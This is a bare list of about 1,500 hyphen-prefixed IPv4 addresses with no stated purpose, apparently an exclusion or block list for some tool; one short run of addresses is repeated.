-112.175.17.169 -103.27.237.107 -192.163.253.226 -202.52.50.3 -118.89.199.99 -182.92.153.188 -23.225.89.88 -23.104.135.49 -5.135.50.141 -103.75.101.6 -203.162.31.171 -182.254.148.194 -168.187.227.39 -91.203.4.165 -45.32.49.129 -167.205.110.8 -142.91.95.91 -91.229.44.3 -61.147.124.51 -120.132.39.13 -49.212.173.30 -95.183.11.40 -199.102.44.103 -45.61.115.11 -66.254.178.24 -123.163.119.66 -58.119.76.3 -5.135.154.12 -125.77.52.143 -178.20.155.12 -185.174.28.119 -23.244.241.192 -94.23.160.185 -121.199.22.24 -123.56.109.126 -82.135.151.20 -123.30.214.134 -82.135.151.64 -210.87.173.199 -77.88.252.119 -109.201.146.82 -114.215.30.153 -151.80.148.231 -89.223.28.135 -118.89.106.105 -112.126.77.162 -198.27.67.130 -216.131.78.204 -118.89.105.118 -114.215.180.63 -91.121.0.12 -14.192.18.185 -106.14.58.11 -94.94.215.82 -113.98.255.37 -13.68.95.145 -54.81.251.72 -108.179.224.171 -118.189.129.243 -91.194.234.18 -195.225.204.142 -216.131.117.10 -203.162.235.70 -120.77.204.182 -121.42.15.51 -101.200.133.112 -35.227.165.245 -207.254.73.173 -42.96.159.142 -209.73.140.165 -45.122.253.31 -41.222.136.42 -178.32.119.132 -182.16.29.83 -208.92.165.58 -95.215.0.169 -69.64.55.81 -13.113.60.66 -172.246.101.139 -139.196.95.164 -42.96.195.53 -121.42.252.114 -47.95.240.102 -125.253.119.189 -203.130.240.54 -192.99.11.124 -5.189.183.206 -174.129.0.133 -93.182.128.69 -139.162.179.122 -123.30.169.148 -93.174.163.197 -91.224.140.178 -122.195.189.245 -61.164.143.30 -137.229.40.80 -120.55.68.46 -123.30.169.47 -120.26.52.182 -120.27.50.233 -103.15.201.7 -172.246.101.107 -101.200.160.107 -160.16.70.252 -185.174.28.101 -87.98.216.38 -123.30.211.39 -162.247.232.87 -61.233.13.20 -175.203.87.12 -106.15.73.203 -122.114.59.173 -109.235.252.130 -142.91.95.215 -203.124.58.218 -109.72.149.30 -210.14.72.62 -178.32.140.234 -186.101.70.163 -89.163.148.113 -119.23.34.127 -111.231.73.128 -45.61.112.34 -23.225.113.5 -123.31.30.66 -184.107.50.183 -45.33.56.19 -50.7.169.12 -216.131.90.233 -203.125.193.122 -198.12.152.19 -172.246.209.6 -115.29.240.37 -211.16.217.41 -113.106.77.231 -202.59.250.162 -31.223.225.5 -119.28.6.226 -54.169.77.186 -192.80.147.144 -115.28.187.206 -198.154.255.27 -104.207.44.97 -199.217.118.158 -185.174.28.134 -120.55.64.174 -121.40.135.20 -103.57.222.105 -115.29.160.231 -101.200.54.65 -222.90.100.138 -158.69.2.20 -216.131.86.197 -118.190.68.192 -23.234.15.42 -103.100.211.27 -82.135.148.119 -185.174.29.196 -45.79.205.208 -103.237.147.153 -115.159.65.75 -158.69.247.103 -80.93.177.96 -128.240.250.6 -172.99.67.36 -69.25.34.28 -107.161.24.123 -119.29.168.167 -216.131.68.116 -216.131.89.241 -23.104.135.152 -104.199.255.125 -185.26.122.217 -91.224.1.11 -37.143.172.8 -212.87.25.75 -171.14.210.124 -54.238.166.138 -210.51.188.160 -153.122.32.29 -219.143.207.136 -216.131.90.238 -172.246.101.231 -216.131.116.75 -216.131.116.78 -216.131.75.2 -81.169.252.70 -184.106.203.182 -157.7.133.172 -45.63.49.84 -23.225.89.228 -173.203.79.45 -120.195.132.77 -125.208.9.84 -121.199.0.232 -160.16.125.65 -178.32.41.59 -88.208.28.53 -94.23.66.177 -88.208.28.120 -114.55.103.165 -91.227.17.20 -202.72.241.30 -202.137.250.8 -114.215.132.114 -104.224.233.61 -212.109.196.77 -116.213.52.215 -61.128.209.58 -82.135.151.5 -93.49.170.199 -195.110.59.139 -103.223.122.49 -112.74.107.59 -193.164.131.56 -66.6.131.48 -88.99.71.205 -218.106.246.68 -64.91.228.230 -45.61.113.49 -88.85.91.16 -123.56.112.13 -23.224.245.9 -5.135.148.131 -133.18.196.211 -172.247.51.60 -89.249.132.6 -175.140.144.154 -177.234.158.100 -45.124.66.116 -173.214.190.70 -37.59.81.70 -96.44.141.163 -58.118.128.16 -79.174.67.210 -121.40.30.130 -133.242.114.170 -109.73.5.72 -61.190.61.78 -142.4.119.118 -59.63.166.115 -193.84.184.66 -123.207.172.28 -212.129.27.21 -123.153.112.212 -201.249.199.172 -92.222.80.131 -45.61.113.17 -47.93.115.222 -114.215.172.223 -103.11.117.147 -112.216.166.154 -166.63.21.50 -123.207.240.95 -45.62.234.14 -120.85.134.117 -88.99.68.43 -133.242.80.229 -218.24.91.250 -99.192.219.68 -94.76.122.11 -125.62.41.226 -192.169.237.50 -67.23.229.115 -31.210.159.181 -111.204.86.195 -66.254.176.71 -121.199.2.185 -31.171.249.126 -89.35.236.80 -144.168.123.13 -151.80.19.57 -65.60.5.66 -23.244.241.254 -45.32.106.59 -121.40.208.66 -121.201.67.194 -47.96.136.231 -222.187.239.245 -121.42.42.195 -114.80.210.71 -188.132.135.58 -103.48.191.234 -142.91.95.196 -194.247.12.109 -69.197.177.230 -122.228.78.80 -82.135.148.205 -70.38.67.117 -120.24.169.185 -50.116.4.116 -172.110.7.90 -61.152.221.136 -195.137.184.38 -91.206.139.2 -177.13.24.246 -37.187.159.113 -50.115.116.238 -103.27.27.46 -35.178.106.133 -185.174.30.194 -149.202.195.163 -172.93.50.226 -104.155.216.120 -23.88.82.67 -45.114.117.230 -113.108.217.13 -52.193.239.121 -120.78.73.224 -23.225.239.179 -213.32.73.2 -82.135.151.52 -66.115.160.37 -23.244.190.170 -120.76.173.21 -172.247.51.156 -91.121.63.132 -199.33.124.76 -97.80.47.148 -75.126.68.2 -172.246.101.193 -106.38.123.242 -103.43.71.182 -192.174.6.68 -86.104.177.15 -62.112.9.91 -23.225.89.22 -103.53.197.235 -144.168.123.2 -23.224.245.12 -219.235.3.86 -106.2.177.181 -52.12.109.150 -210.209.71.81 -166.62.84.137 -173.192.196.110 -107.180.68.241 -176.31.147.158 -52.73.252.215 -5.160.219.50 -13.115.82.69 -182.254.246.101 -114.119.41.93 -221.239.43.2 -62.150.74.107 -87.98.153.213 -23.224.115.104 -47.91.237.215 -153.122.37.3 -192.80.147.18 -54.156.33.197 -37.59.149.26 -104.250.135.21 -68.168.114.197 -60.205.153.38 -23.88.82.171 -93.42.213.29 -199.168.189.3 -207.58.164.196 -109.201.149.210 -75.126.165.222 -139.129.167.109 -120.78.215.50 -82.135.151.138 -116.236.231.229 -192.155.224.190 -82.135.148.214 -82.135.148.216 -45.114.94.71 -112.133.201.78 -45.33.39.125 -217.16.18.250 -218.58.197.191 -86.104.177.34 -123.206.182.93 -46.245.167.19 -180.178.45.212 -118.178.87.184 -218.244.142.138 -69.87.198.115 -120.76.101.194 -54.227.115.37 -167.114.65.31 -178.33.20.223 -37.59.146.72 -101.88.13.242 -120.77.250.229 -193.70.94.254 -116.236.187.4 -23.252.165.227 -192.99.78.21 -103.224.250.32 -119.28.129.109 -101.37.78.171 -58.62.235.21 -52.77.105.196 -195.225.204.173 -109.201.146.110 -123.207.246.11 -52.203.122.179 -82.135.151.216 -94.23.93.40 -158.69.93.62 -96.44.179.247 -185.26.122.151 -45.63.6.180 -60.205.138.127 -39.108.76.104 -115.29.200.146 -172.104.167.242 -89.108.86.90 -36.110.103.228 -101.201.109.67 -86.109.170.9 -27.120.111.34 -107.6.146.102 -34.253.20.11 -120.24.184.218 -222.97.197.133 -87.230.78.175 -82.135.151.205 -217.182.194.95 -82.135.151.169 -114.55.24.77 -82.135.151.167 -82.135.151.175 -82.135.151.105 -202.170.122.231 -64.110.129.101 -37.59.146.77 -114.55.34.192 -137.74.118.52 -81.161.32.5 -23.224.115.221 -104.243.139.165 -216.92.252.114 -132.148.81.205 -81.169.204.212 -112.74.27.154 -45.77.21.23 -66.220.11.152 -108.170.59.213 -142.4.119.72 -191.101.150.233 -31.41.218.134 -112.124.107.111 -177.93.110.18 -180.76.162.249 -95.173.170.43 -82.135.151.145 -82.135.151.236 -45.32.129.29 -104.203.82.157 -23.244.190.183 -198.57.202.230 -23.225.239.41 -173.82.245.236 -23.225.113.139 -45.63.55.6 -119.113.119.94 -203.189.232.27 -23.88.82.174 -173.214.179.167 -101.201.68.149 -207.244.70.164 -54.77.194.251 -112.74.29.17 -208.43.222.105 -77.234.201.203 -173.214.176.90 -173.212.211.131 -52.77.215.127 -54.193.249.136 -120.26.129.173 -202.4.96.85 -217.182.117.136 -82.135.151.89 -13.114.38.180 -13.113.206.193 -52.91.107.65 -82.135.151.196 -82.135.151.91 -82.135.151.191 -50.7.169.11 -149.56.18.62 -39.108.13.242 -103.108.140.241 -218.60.94.23 -142.4.119.108 -151.80.144.122 -176.9.253.226 -173.236.115.135 -23.88.82.59 -121.40.162.236 -14.152.78.151 -54.88.61.81 -45.61.115.10 -112.124.14.179 -192.99.184.21 -185.174.30.177 -120.27.210.218 -185.153.229.211 -123.56.113.240 -118.193.192.181 -77.81.104.126 -103.100.208.212 -67.225.249.251 -45.126.122.150 -192.99.114.191 -45.114.94.39 -121.42.171.172 -94.138.212.34 -109.169.76.60 -178.33.113.85 -52.64.196.47 -195.20.15.53 -212.68.50.251 -14.215.113.57 -52.193.209.100 -142.44.176.40 -66.135.36.222 -23.225.113.213 -113.108.103.26 -89.171.61.27 -192.99.93.180 -78.110.170.226 -221.229.244.190 -202.91.226.85 -209.205.202.210 -23.92.18.92 -23.88.82.180 -79.172.239.247 -112.74.216.157 -106.187.94.124 -119.6.241.76 -118.190.137.217 -65.60.43.170 -182.16.58.35 -93.95.59.213 -82.135.151.197 -82.135.151.114 -82.135.151.46 -23.92.31.70 -94.103.150.51 -45.76.156.237 -217.147.91.162 -112.74.67.53 -91.191.223.14 -72.1.245.70 -218.76.6.46 -185.94.239.203 -162.13.154.65 -119.29.82.202 -199.119.140.24 -39.108.209.189 -82.135.151.215 -198.200.41.90 -111.230.129.119 -185.122.201.4 -23.224.244.54 -183.64.110.156 -119.29.115.193 -123.207.9.219 -113.190.232.119 -82.135.151.141 -117.34.7.16 -106.2.179.136 -13.57.125.94 -104.161.79.106 -180.76.243.74 -91.218.211.212 -90.156.143.25 -47.92.71.16 -117.85.109.191 -115.28.83.113 -213.152.180.213 -45.114.94.189 -118.145.20.29 -114.55.57.99 -149.56.41.120 -103.65.181.139 -69.20.42.75 -91.227.16.59 -120.205.13.100 -172.246.101.111 -101.132.190.150 -190.196.158.42 -65.60.5.116 -23.225.239.117 -111.231.112.15 -192.165.51.197 -37.187.157.210 -114.215.199.163 -149.154.69.143 -106.184.3.176 -120.27.26.166 -79.137.3.32 -104.203.82.218 -190.111.124.30 -66.254.190.199 -199.119.252.84 -209.133.208.76 -121.42.141.105 -122.114.17.37 -78.31.166.28 -69.25.136.45 -178.33.113.45 -123.31.42.121 -120.24.159.9 -149.56.151.158 -182.254.243.115 -192.151.202.101 -52.77.247.232 -45.33.40.4 -49.212.153.167 -182.92.183.161 -205.209.155.44 -134.119.89.100 -37.59.97.43 -68.168.104.30 -43.243.74.34 -23.104.135.238 -221.186.73.197 -161.202.10.155 -74.63.228.247 -121.199.50.60 -208.118.240.148 -119.59.108.246 -107.180.84.248 -104.203.82.174 -218.95.162.232 -212.68.42.43 -75.98.175.8 -54.65.90.178 -91.241.66.43 -119.122.213.191 -142.91.95.244 -61.184.131.26 -202.72.212.173 -123.57.81.209 -95.47.161.67 -104.207.40.182 -65.60.6.48 -217.112.131.171 -69.5.199.253 -182.74.113.50 -59.106.191.112 -125.117.222.35 -69.164.210.133 -54.64.72.44 -39.108.151.105 -116.226.111.43 -158.69.100.51 -172.247.51.39 -61.220.191.179 -144.217.94.115 -216.92.83.55 -104.207.44.118 -113.98.194.221 -192.99.39.40 -59.110.47.137 -50.17.194.124 -115.159.22.217 -185.94.236.104 -204.8.179.91 -92.243.5.250 -119.28.62.231 -45.118.149.128 -46.245.167.13 -217.145.92.12 -193.108.122.40 -120.92.119.16 -198.200.41.40 -43.230.202.105 -85.143.168.208 -37.128.149.20 -45.32.100.41 -54.249.3.139 -23.244.190.29 -221.236.173.35 -201.49.21.17 -223.202.197.137 -67.222.133.244 -114.55.63.104 -123.29.75.153 -107.150.41.27 -101.200.1.14 -160.16.73.142 -87.106.7.246 -192.80.147.92 -69.175.18.37 -221.238.152.107 -58.60.152.224 -203.145.132.7 -106.38.49.27 -104.207.52.119 -123.57.138.170 -47.92.106.47 -217.199.164.75 -69.175.69.20 -192.187.113.29 -178.33.110.108 -155.94.205.171 -23.244.190.102 -118.89.34.251 -120.26.98.240 -213.202.247.121 -195.88.208.133 -104.129.61.38 -43.230.202.102 -112.74.166.6 -151.80.25.207 -45.119.83.6 -199.96.214.94 -103.231.167.203 -93.84.114.74 -182.92.71.8 -121.54.160.180 -182.254.246.112 -139.199.160.95 -23.88.82.82 -122.114.18.116 -45.114.94.53 -23.225.113.54 -39.108.238.118 -185.174.29.222 -93.188.166.71 -193.70.92.170 -82.135.151.48 -36.66.82.178 -58.87.80.228 -149.210.216.176 -27.154.53.154 -192.80.147.149 -98.126.34.187 -74.208.221.191 -104.129.41.36 -107.21.81.176 -13.115.8.173 -185.174.28.103 -119.29.164.155 -66.254.163.11 -142.4.27.232 -121.42.142.250 -120.27.237.62 -61.190.16.132 -23.244.241.243 -162.221.200.53 -144.217.31.86 -45.114.94.231 -101.37.39.56 -103.7.41.97 -120.26.57.233 -120.194.235.126 -114.55.33.132 -109.169.10.141 -185.174.28.143 -144.217.243.127 -133.242.201.36 -103.30.145.110 -5.196.108.131 -113.31.17.38 -13.113.12.160 -184.168.109.12 -23.225.113.171 -52.5.254.172 -119.29.67.99 -118.178.143.22 -5.189.143.19 -103.9.158.115 -123.56.42.171 -87.98.234.125 -23.225.239.114 -125.67.65.81 -115.238.55.181 -223.223.178.7 -174.142.112.141 -115.238.251.138 -103.28.100.164 -203.189.235.82 -171.244.34.251 -167.88.115.133 -149.154.65.112 -121.40.36.254 -93.39.235.59 -116.196.105.6 -212.7.222.34 -115.29.6.208 -45.61.115.19 -173.243.113.152 -103.247.38.119 -142.91.95.118 -23.229.227.176 -190.108.84.188 -87.106.99.184 -51.254.5.209 -172.110.10.217 -121.40.54.252 -91.205.17.80 -142.4.103.118 -104.207.52.117 -120.26.235.152 -122.114.222.66 -213.155.107.25 -45.114.94.32 -157.7.249.54 -86.104.177.82 -23.244.190.38 -91.237.109.36 -169.53.83.4 -46.45.139.109 -192.80.147.44 -184.154.216.43 -5.189.166.113 -190.85.193.125 -64.120.123.196 -65.60.46.155 -54.249.252.153 -49.212.184.168 -211.115.80.16 -173.249.158.23 -185.174.28.75 -162.211.87.91 -116.66.238.66 -23.225.113.89 -47.100.180.59 -50.28.79.145 -23.225.113.6 -123.57.15.178 -101.201.198.19 -198.1.95.204 -95.213.252.130 -223.223.178.29 -178.21.10.202 -27.109.24.35 -176.31.138.34 -47.90.14.108 -91.237.99.144 -121.43.183.126 -101.251.111.95 -45.118.248.38 -115.159.185.190 -216.45.52.40 -142.4.103.72 -210.27.146.184 -37.187.89.83 -124.124.66.155 -125.212.217.16 -104.160.27.2 -123.57.7.0 -121.42.172.178 -37.59.33.79 -100.43.157.124 -220.229.64.232 -50.63.174.141 -219.142.40.54 -23.244.190.75 -85.93.145.220 -23.104.135.198 -42.112.25.213 -45.56.216.5 -82.165.130.177 -171.244.3.176 -47.92.73.115 -219.130.115.209 -177.184.18.93 -197.81.195.221 -104.203.82.168 -142.4.200.118 -188.165.5.243 -50.97.175.54 -185.174.28.127 -64.120.123.214 -101.37.21.23 -139.162.110.171 -45.114.94.149 -37.59.116.215 -115.219.32.6 -54.144.33.70 -64.118.92.10 -52.199.176.17 -183.154.182.251 -72.1.245.15 -122.226.189.75 -198.55.102.170 -54.76.199.44 -222.189.211.18 -40.68.228.122 -170.75.251.7 -178.33.108.76 -115.28.185.95 -23.88.82.100 -91.134.171.244 -182.131.21.77 -115.29.178.47 -193.33.111.120 -107.190.233.67 -120.76.84.98 -121.41.230.249 -45.114.94.230 -172.247.51.89 -158.69.218.42 -54.254.129.189 -23.88.113.153 -103.92.26.81 -116.62.140.210 -149.202.117.76 -23.225.113.138 -192.80.147.16 -193.180.164.102 -120.25.76.73 -173.236.115.250 -23.225.239.145 -121.41.31.205 -104.238.150.32 -203.175.170.16 -160.16.114.221 -112.16.182.23 -120.24.255.79 -91.237.99.143 -5.196.110.168 -200.32.2.167 -118.144.162.15 -49.5.8.132 -23.88.82.140 -191.96.249.149 -149.56.242.121 -123.57.191.113 -42.62.52.144 -192.184.84.191 -115.159.114.25 -111.74.239.214 -60.253.124.34 -153.120.50.212 -216.168.188.12 -205.251.152.102 -123.176.31.61 -52.193.114.55 -45.61.115.50 -45.32.78.24 -23.244.241.30 -91.186.17.37 -121.41.22.119 -104.207.52.110 -120.76.225.149 -45.114.94.130 -31.7.37.229 -176.31.234.115 -218.28.137.30 -112.74.194.136 -120.195.142.250 -120.26.60.96 -119.59.101.251 -51.255.142.161 -23.225.239.87 -192.99.27.91 -118.190.43.15 -72.251.245.178 -45.77.34.158 -182.254.217.161 -113.109.29.165 -198.200.41.39 -206.217.216.77 -207.244.97.240 -88.208.239.42 -86.104.177.68 -43.230.202.12 -60.205.58.212 -173.255.224.125 -96.126.102.162 -173.212.212.229 -192.80.147.204 -52.199.212.121 -89.108.124.41 -122.114.133.23 -23.244.190.7 -162.216.17.162 -107.180.84.64 -34.212.190.205 -202.153.179.202 -23.224.244.6 -74.208.147.114 -91.121.254.194 -185.174.28.109 -43.230.200.254 -222.140.16.39 -143.255.12.14 -52.221.46.173 -88.99.113.139 -34.242.101.203 -23.225.239.92 -116.62.191.90 -123.207.39.35 -23.235.234.20 -166.62.94.114 -142.4.107.230 -122.195.189.182 -195.197.195.34 -23.244.241.141 -93.123.36.43 -23.244.190.137 -121.41.121.46 -101.68.90.168 -66.23.237.5 -64.74.216.90 -94.138.207.202 -82.135.151.110 -43.230.200.182 -123.133.78.47 -198.24.128.28 -115.29.151.185 -5.196.100.66 -23.104.135.44 -59.56.110.30 -60.205.213.87 -194.88.107.116 -219.153.51.55 -66.193.212.241 -198.200.41.52 -107.165.11.110 -139.162.86.14 -167.160.191.253 -104.237.0.218 -121.199.14.172 -174.37.242.36 -45.77.38.99 -107.151.78.204 -114.251.70.53 -45.61.115.28 -117.27.251.106 -204.11.233.148 -176.99.2.234 -155.254.18.249 -64.91.229.195 -124.232.153.6 -121.40.189.180 -199.168.189.2 -122.144.144.214 -207.244.104.107 -121.41.37.81 -49.212.151.173 -133.242.150.157 -59.110.139.125 -121.199.45.164 -195.28.180.129 -198.50.237.202 -85.159.214.233 -139.162.54.187 -104.207.40.178 -101.201.104.102 -39.108.228.205 -203.188.251.42 -139.224.164.125 -37.143.15.10 -148.163.166.60 -93.190.140.180 -189.16.89.229 -47.90.104.136 -34.202.227.161 -199.27.180.238 -23.225.239.19 -43.226.45.38 -192.99.63.208 -45.32.122.11 -37.59.213.90 -192.126.116.153 -104.207.50.92 -37.61.206.105 -186.251.47.18 -144.168.74.142 -171.88.20.246 -139.162.72.6 -172.246.101.8 -93.93.52.247 -35.200.90.33 -103.53.199.53 -182.254.129.117 -185.174.31.241 -153.122.75.13 -139.196.29.154 -54.36.65.149 -183.62.139.75 -173.236.115.244 -107.161.28.179 -192.80.147.105 -198.24.128.9 -121.40.139.198 -52.66.97.242 -119.29.67.35 -121.40.200.204 -185.185.233.148 -133.130.71.184 -72.1.245.50 -124.158.6.210 -142.4.103.116 -107.148.194.27 -78.33.47.27 -115.159.117.237 -91.201.240.147 -118.190.78.204 -45.63.127.93 -124.173.116.194 -103.73.161.227 -80.249.164.153 -209.142.66.211 -112.74.65.202 -132.148.1.245 -31.184.197.32 -119.29.146.115 -178.33.15.65 -173.232.149.165 -189.113.160.151 -103.27.63.73 -123.157.96.104 -115.159.57.181 -182.23.128.20 -155.94.195.155 -116.196.104.176 -113.108.91.132 -50.116.23.27 -104.203.82.77 -182.92.179.84 -46.152.133.86 -64.187.239.194 -198.46.121.227 -106.2.222.19 -164.132.198.101 -185.38.164.223 -78.24.162.58 -46.28.207.188 -37.120.185.34 -45.79.174.220 -139.224.24.193 -39.108.151.176 -198.11.179.126 -45.114.94.209 -210.27.145.8 -72.47.234.222 -94.23.3.127 -86.104.177.16 -121.196.200.236 -173.0.156.185 -119.29.163.53 -121.41.32.205 -162.223.162.13 -119.118.163.26 -111.75.208.215 -5.199.133.52 -114.67.71.145 -193.45.5.181 -199.231.226.40 -50.22.56.28 -120.25.230.104 -198.200.41.111 -116.62.35.116 -175.6.228.197 -66.39.65.245 -92.75.3.126 -192.155.91.129 -96.126.100.39 -119.59.101.115 -156.67.216.112 -42.96.196.117 -114.143.108.149 -142.91.95.96 -118.185.13.34 -45.114.94.209 -210.27.145.8 -72.47.234.222 -94.23.3.127 -86.104.177.16 -121.196.200.236 -173.0.156.185 -119.29.163.53 -121.41.32.205 -162.223.162.13 -119.118.163.26 -111.75.208.215 -5.199.133.52 -114.67.71.145 -193.45.5.181 -199.231.226.40 -50.22.56.28 -120.25.230.104 -198.200.41.111 -116.62.35.116 -175.6.228.197 -66.39.65.245 -92.75.3.126 -192.155.91.129 -96.126.100.39 -119.59.101.115 -156.67.216.112 -42.96.196.117 -114.143.108.149 -142.91.95.96 -118.185.13.34 -112.126.91.21 -23.239.201.228 -72.1.245.40 -54.197.235.17 -112.74.212.63 -112.74.131.115 -202.168.148.227 -114.215.197.8 -69.20.42.78 -23.224.115.48 -61.153.198.102 -104.165.44.98 -107.191.58.22 -99.192.219.75 -120.77.253.128 -106.15.193.252 -185.62.75.170 -139.162.227.214 -107.191.99.93 -142.91.95.243 -66.254.163.7 -121.41.93.199 -116.236.187.5 -46.72.126.48 -172.247.51.254 -103.80.134.218 -47.91.19.80 -203.162.70.46 -118.190.48.115 -121.40.201.161 -188.215.245.210 -103.229.215.211 -205.251.138.124 -23.104.135.99 -173.232.149.166 -52.80.138.103 -64.237.53.72 -120.25.70.154 -23.224.243.33 -91.102.162.75 -123.129.217.26 -199.96.214.91 -151.80.116.123 -197.232.56.15 -198.24.128.23 -111.68.12.94 -66.39.114.253 -118.193.184.219 -82.135.151.71 -27.255.83.77 -52.201.218.149 -101.96.143.42 -67.228.3.239 -119.81.37.2 -162.214.2.40 -220.163.128.186 -192.99.93.179 -46.242.130.243 -112.74.85.1 -192.80.147.56 -69.163.37.73 -108.166.79.34 -78.130.187.155 -45.114.94.111 -178.16.150.186 -58.64.177.26 -118.25.35.138 -144.217.7.62 -101.201.40.201 -183.181.16.177 -120.27.24.221 -66.39.63.16 -107.150.41.29 -52.193.150.16 -125.212.228.74 -142.4.107.245 -104.203.82.153 -107.180.84.43 -188.132.147.22 -169.57.128.90 -182.50.64.109 -198.200.41.125 -23.225.113.126 -118.31.171.213 -149.202.211.49 -45.76.74.93 -54.165.204.232 -95.143.193.26 -138.219.231.179 -23.88.82.11 -203.189.97.32 -23.92.219.107 -199.217.112.21 -45.77.200.34 -65.19.143.201 -202.43.108.11 -176.126.165.41 -118.89.43.127 -188.132.147.158 -168.235.89.152 -178.238.46.17 -27.254.62.74 -91.83.122.64 -115.29.5.53 -202.47.117.12 -161.202.10.151 -23.244.241.200 -119.28.12.242 -163.44.196.55 -133.242.195.153 -209.126.96.147 -50.62.42.188 -199.96.214.69 -47.92.32.228 -101.231.219.14 -172.247.51.249 -222.162.143.77 -192.99.114.184 -166.78.27.35 -46.105.122.216 -69.65.56.181 -114.215.131.156 -62.173.141.109 -107.181.251.146 -42.112.38.199 -209.205.202.211 -166.62.35.21 -5.135.143.76 -85.214.196.102 -23.224.244.57 -173.249.151.129 -129.121.27.243 -106.14.107.188 -182.92.66.163 -91.196.9.245 -54.36.173.52 -139.196.236.137 -5.196.183.229 -115.28.247.79 -139.129.192.240 -101.201.110.239 -188.165.139.125 -101.132.181.115 -122.224.204.74 -180.158.203.132 -74.122.121.189 -65.23.156.150 -98.126.17.74 -23.224.242.5 -217.66.162.53 -23.244.241.130 -169.38.95.59 -139.196.217.73 -107.151.154.22 -192.169.234.16 -87.101.226.158 -50.116.4.217 -148.66.19.229 -104.168.149.224 -85.255.6.109 -139.162.151.26 -116.236.231.171 -221.2.82.86 -123.56.120.16 -192.96.206.107 -23.253.111.135 -142.91.95.139 -5.196.197.132 -23.224.243.22 -104.203.82.199 -107.167.183.223 -182.254.153.249 -123.71.216.216 -23.104.135.46 -68.169.51.20 -85.248.220.73 -121.40.161.226 -216.104.35.69 -59.110.22.128 -192.99.35.96 -209.236.114.126 -112.124.32.246 -182.254.211.64 -79.137.121.116 -104.239.198.107 -118.123.6.161 -43.242.181.139 -121.43.144.205 -185.52.231.248 -183.131.22.69 -103.80.238.144 -119.23.58.243 -172.247.51.196 -142.4.107.109 -86.104.177.21 -52.68.7.60 -161.30.28.7 -23.244.190.81 -64.120.123.159 -223.105.1.81 -218.16.123.85 -45.32.90.106 -58.215.57.77 -217.182.72.123 -178.57.220.162 -120.26.221.227 -139.129.29.176 -121.201.110.12 -91.192.200.57 -111.204.157.236 -123.57.228.41 -129.213.39.118 -124.160.31.221 -47.100.100.40 -103.200.22.144 -180.232.82.131 -123.56.15.159 -194.58.120.40 -107.158.255.221 -121.40.134.212 -182.92.114.178 -220.172.31.95 -104.203.82.123 -119.29.188.22 -115.28.166.130 -37.123.99.70 -121.41.4.19 -23.104.135.177 -88.200.200.142 -185.122.54.8 -61.155.9.36 -23.244.190.224 -216.131.81.125 -47.52.11.17 -54.36.235.44 -120.24.73.34 -23.225.113.207 -74.122.132.142 -72.1.245.11 -178.33.54.117 -49.212.196.27 -23.224.245.34 -121.40.241.48 -121.40.39.90 -45.114.94.233 -54.38.37.254 -112.29.248.21 -104.238.95.138 -188.240.88.221 -133.242.167.198 -221.229.173.201 -194.226.171.131 -104.171.172.253 -166.63.21.103 -198.50.176.74 -54.175.3.248 -45.77.43.94 -116.62.148.251 -93.90.183.173 -188.254.32.239 -23.244.241.110 -69.87.197.162 -45.114.94.243 -125.212.220.188 -66.175.210.132 -208.115.102.148 -139.224.58.199 -207.20.231.25 -82.102.14.21 -60.205.104.93 -116.236.231.213 -95.211.135.10 -120.24.246.235 -94.23.65.197 -119.29.35.224 -192.169.215.231 -62.109.17.85 -94.23.19.83 -45.77.36.124 -178.33.113.211 -103.230.110.228 -54.248.233.247 -89.163.131.52 -78.155.197.118 -59.86.160.24 -106.38.138.160 -107.180.84.42 -104.250.143.196 -110.189.29.169 -104.203.82.116 -121.196.199.210 -95.213.133.130 -184.168.98.99 -104.197.71.16 -45.33.27.245 -103.247.10.199 -103.246.18.170 -23.225.113.134 -198.200.41.57 -203.137.39.96 -104.203.82.228 -85.172.31.174 -54.83.104.50 -122.10.117.153 -61.219.194.186 -52.199.44.59 -103.248.139.143 -121.42.25.112 -120.77.105.109 -13.127.141.125 -42.112.20.91 -64.31.31.132 -72.52.126.146 -5.39.41.204 -23.88.82.199 -107.180.85.46 -149.56.23.227 -192.99.31.18 -65.60.22.20 -85.17.174.137 -23.224.115.70 -45.61.115.60 -118.190.94.129 -69.30.232.26 -212.71.254.216 -82.135.151.128 -52.73.116.47 -79.174.76.30 -114.55.230.206 -23.225.89.7 -23.225.239.74 -118.190.25.121 -88.214.230.127 -149.56.36.191 -74.208.47.60 -52.192.221.166 -64.31.31.147 -119.28.71.64 -188.165.34.247 -45.77.68.94 -45.121.163.48 -185.174.30.174 -183.136.236.52 -114.215.44.127 -122.114.98.135 -146.71.48.77 -58.138.174.203 -65.60.5.124 -119.29.230.153 -45.114.94.98 -94.237.34.252 -45.63.10.168 -210.56.55.135 -31.186.101.124 -120.26.102.4 -47.98.99.0 -104.239.139.143 -41.189.183.69 -144.168.71.138 -14.102.63.131 -172.104.67.159 -120.25.217.186 -124.251.60.192 -94.156.102.101 -118.175.89.137 -86.109.170.5 -198.71.88.13 -211.144.120.43 -93.174.2.30 -49.212.162.112 -47.61.247.96 -176.34.165.147 -23.244.241.217 -23.225.113.84 -178.33.162.6 -185.16.37.51 -47.100.42.68 -185.174.29.213 -207.55.87.130 -23.224.115.63 -217.182.214.127 -115.29.79.126 -103.17.108.37 -23.224.243.31 -184.107.164.134 -185.174.28.123 -39.108.147.92 -64.118.90.238 -103.193.175.189 -182.254.234.147 -89.33.247.27 -54.172.92.92 -41.74.182.78 -122.97.253.213 -107.181.251.152 -139.224.65.16 -120.25.150.2 -194.54.83.197 -35.177.139.110 -185.174.30.164 -134.119.219.164 -115.28.227.166 -23.244.190.197 -162.247.233.42 -216.117.137.174 -121.42.42.239 -198.13.50.160 -64.120.123.141 -168.235.87.153 -23.225.89.13 -14.23.152.200 -67.222.13.208 -49.212.162.116 -45.32.112.83 -82.135.148.251 -169.53.174.210 -117.69.116.232 -183.56.129.146 -115.28.174.159 -64.120.123.252 -210.14.142.11 -182.16.34.253 -173.236.115.188 -23.224.243.21 -158.69.142.146 -114.55.144.64 -70.38.64.38 -94.250.251.20 -82.135.151.241 -23.224.242.29 -139.199.9.103 -104.203.82.150 -58.62.206.242 -220.243.227.19 -23.225.113.13 -188.132.147.37 -142.4.103.83 -47.92.132.65 -52.191.169.94 -5.196.74.96 -202.53.169.50 -110.80.13.194 -47.93.197.153 -144.168.74.134 -79.137.66.116 -109.123.94.63 -94.23.94.238 -123.56.176.4 -115.28.153.164 -112.124.111.39 -182.92.234.63 -65.60.59.125 -194.58.111.183 -89.163.240.231 -47.92.81.247 -119.29.114.112 -144.48.125.138 -65.60.22.24 -188.165.132.164 -87.237.202.111 -119.29.241.12 -202.130.44.172 -23.244.241.9 -172.246.101.97 -216.92.18.128 -186.249.1.156 -113.107.205.27 -183.3.129.219 -188.165.251.218 